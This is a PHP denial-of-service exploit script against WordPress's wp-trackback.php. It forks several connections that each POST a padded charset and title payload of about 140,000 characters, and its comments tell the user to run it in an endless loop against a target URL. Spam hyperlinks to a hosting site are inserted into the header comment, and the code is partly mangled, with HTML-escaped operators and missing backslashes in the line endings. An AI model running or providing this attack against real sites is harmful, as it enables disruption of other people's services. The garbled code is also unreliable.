<?php
/*
* <a title="WordPress" href="http://www.pusathosting.com/pages/wordpress-hosting" >wordpress</a> Resource exhaustion Exploit
* http://rooibo.wordpress.com/
* <a title="Perlambat Ulah Hacker dengan Encrypt file Konfigurasi Website" href="http://www.pusathosting.com/blog/2011/10/01/perlambat-ulah-hacker-dengan-encrypt-file-konfigurasi-website/">security</a>@wordpress.org contacted and get a response,
* but no solution available.
*
* [18/10/2009 20:31:00] modified by Zerial http://blog.zerial.org
 
*
* exploiting:
* you must install php-cli (command line interface)
* $ while /bin/true; do php wp-trackbacks_dos.php http://target.com/wordpress; done
*
*/
if(count($argv) &lt; 2)
die("You need to specify a url to attackn");
$url = $argv[1];
$data = parse_url($url);
if(count($data) &lt; 2)
die("The url should have http:// in front of it, and should be complete.n");
$path = (count($data)==2)?"":$data['path'];
$path = trim($path,'/').'/wp-trackback.php';
if($path{0} != '/')
$path = '/'.$path;
$b = ""; $b = str_pad($b,140000,'ABCEDFG').utf8_encode($b);
$charset = "";
$charset = str_pad($charset,140000,"UTF-8,");
$str = 'charset='.urlencode($charset);
$str .= '&amp;url=www.example.com';
$str .= '&amp;title='.$b;
$str .= '&amp;blog_name=lol';
$str .= '&amp;excerpt=lol';
for($n = 0; $n &lt;= 5; $n++){ $fp = @fsockopen($data['host'],80); if(!$fp) die("unable to connect to: ".$data['host']."n"); $pid[$n] = pcntl_fork(); if(!$pid[$n]){ fputs($fp, "POST $path HTTP/1.1rn"); fputs($fp, "Host: ".$data['host']."rn"); fputs($fp, "Content-type: application/x-www-form-urlencodedrn"); fputs($fp, "Content-length: ".strlen($str)."rn"); fputs($fp, "Connection: closernrn"); fputs($fp, $str."rnrn"); echo "hit!n"; } }
?&gt;